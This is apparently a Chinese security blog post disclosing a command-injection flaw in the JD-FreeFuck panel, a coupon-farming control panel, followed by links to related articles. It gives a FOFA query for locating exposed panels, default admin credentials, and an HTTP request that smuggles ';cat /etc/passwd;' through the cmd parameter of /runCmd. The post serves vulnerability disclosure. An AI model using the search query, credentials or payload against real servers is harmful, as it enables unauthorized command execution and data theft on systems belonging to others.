漏洞描述

i ⭐JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器 项目地址: https://github.com/meselson/JD-FreeFuck

漏洞影响

s ✅JD-FreeFuck

空间测绘

d ⭕FOFA:title="京东薅羊毛控制面板"

漏洞复现

  • 访问后登录页面如下

  • ✅ 默认账号useradmin/supermanito
POST /runCmd HTTP/1.1cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500

个人博客

孤桜懶契:https://gylq.gitee.io/time

JD-FreeFuck 京东薅羊毛控制面板 后台命令执行漏洞相关推荐

  1. XXL-JOB 任务调度中心 后台任意命令执行漏洞

    XXL-JOB 任务调度中心 0x01 漏洞描述 0x02 漏洞指纹 0x03 漏洞复现 0x04 漏洞示例 0x01 漏洞描述 在日常开发中,经常会用定时任务执行某些不紧急又非常重要的事情,例如批量 ...

  2. 群晖NAS教程(十九)、利用Docker安装青龙面板(京东薅羊毛)

    为了更好的浏览体验,欢迎光顾勤奋的凯尔森同学个人博客 群晖NAS教程(十九).利用Docker安装青龙面板(京东薅羊毛) 一.安装qinglong容器 在群晖docker套件中,搜索qinglong, ...

  3. phpwind index.php?m=designc=api,phpwind v9存在命令执行漏洞(登陆后台)

    已知漏洞:https://www.seebug.org/vuldb/ssvid-94465 phpwind v9最新版存在命令执行漏洞(登陆后台) Phpwind_v9.0.2(最新版),phpwin ...

  4. Hue 后台编辑器 远程命令执行漏洞

    Hue 后台编辑器 远程命令执行漏洞 此文章仅供用于学习研究,严禁用于非法用途,否则后果自负. 漏洞简介 Hue 后台编辑器存在命令执行漏洞,攻击者通过编辑上传 xxx.sh 文件即可达到命令执行的目 ...

  5. 齐治堡垒机后台存在命令执行漏洞(CNVD-2019-17294)分析

    基本信息 引用:https://www.cnvd.org.cn/flaw/show/CNVD-2019-17294 补丁信息:该漏洞的修复补丁已于2019年6月25日发布.如果客户尚未修复该补丁,可联 ...

  6. Nexus Repository Manager 3 远程命令执行漏洞 CVE-2019-7238

    目录 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 端口设置 Vulnhub官方复现教程 https://vulhub.org/#/environments/nexus/CVE- ...

  7. webmin远程命令执行漏洞(cve-2019-15107)深入分析

    漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件. Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的 ...

  8. 【安全漏洞】Rocket.Chat 远程命令执行漏洞分析

    简述 Rocket.Chat 是一个开源的完全可定制的通信平台,由 Javascript 开发,适用于具有高标准数据保护的组织. 2021年3月19日,该漏洞在 HackerOne 被提出,于2021 ...

  9. weblogic发序列化命令执行漏洞工具分享

    weblogic发序列化命令执行漏洞工具分享(链接: https://pan.baidu.com/s/1qE5MFJ32672l-MMl-QL-wQ 密码: d85j) JBOSS_EXP 工具分享( ...

最新文章

  1. 第十届蓝桥杯java B组—试题I 后缀表达式
  2. 全球及中国成人病袍行业专项调研评估及未来发展趋势预测报告2021-2027年版
  3. 七十八、SpringBoot监听rabbitmq和创建交换器,队列
  4. CSS的计数器:counter-increment与counter-reset
  5. [转]Android应用的自动更新
  6. StringBuffer练习
  7. 【微型计算机原理与接口技术】寻址方式
  8. Linux centos7安装RabbitMQ3.8.9
  9. 如何在Java中将集合转换为列表
  10. 下载频道12月热门资源TOP100强力推荐!
  11. hadoop源码学习(-)
  12. 计蒜客 蓝桥杯模拟五 合并数字
  13. iOS 禁用休闲时钟锁屏
  14. 中南大学计算机学院楠,中南比湖大更湖大,不对,应该说湖大没中南大学中南。...
  15. mysql 查连接数,查看MySQL的连接数
  16. 40岁后学习编程是否太晚了?7点技巧让学习变得轻松有趣
  17. 2018 秋招 百度二轮面试---血淋淋的经历写实
  18. 嵌入式系统框架----硬件篇
  19. Cesium渐变色3dtiles白模(视频)
  20. WebGoat v8.1.0 下载安装(windows)

热门文章

  1. CSS 背景(background)
  2. 【信号处理】基于优化算法的 SAR 信号处理(Matlab代码实现)
  3. Heavy Transportation重型运输(Dijkstra算法 - 详解)
  4. 立秋后6大脏器排毒法 干净才是真正文艺范儿(转)
  5. 化工人员定位系统提供智能安全保障
  6. maven settings.xml 配置
  7. Autoencoder-based Zeroth Order Optimization Method for Attacking Black-box Neural Networks
  8. Sa-Token的Token有效期和临时有效期的区别
  9. JCR分区(WOS或Thomson Reuters或汤姆森 路透)和中科院分区(附网址及查询方法)...
  10. 通过chrome来找到淘票票猫眼电影京东淘宝api接口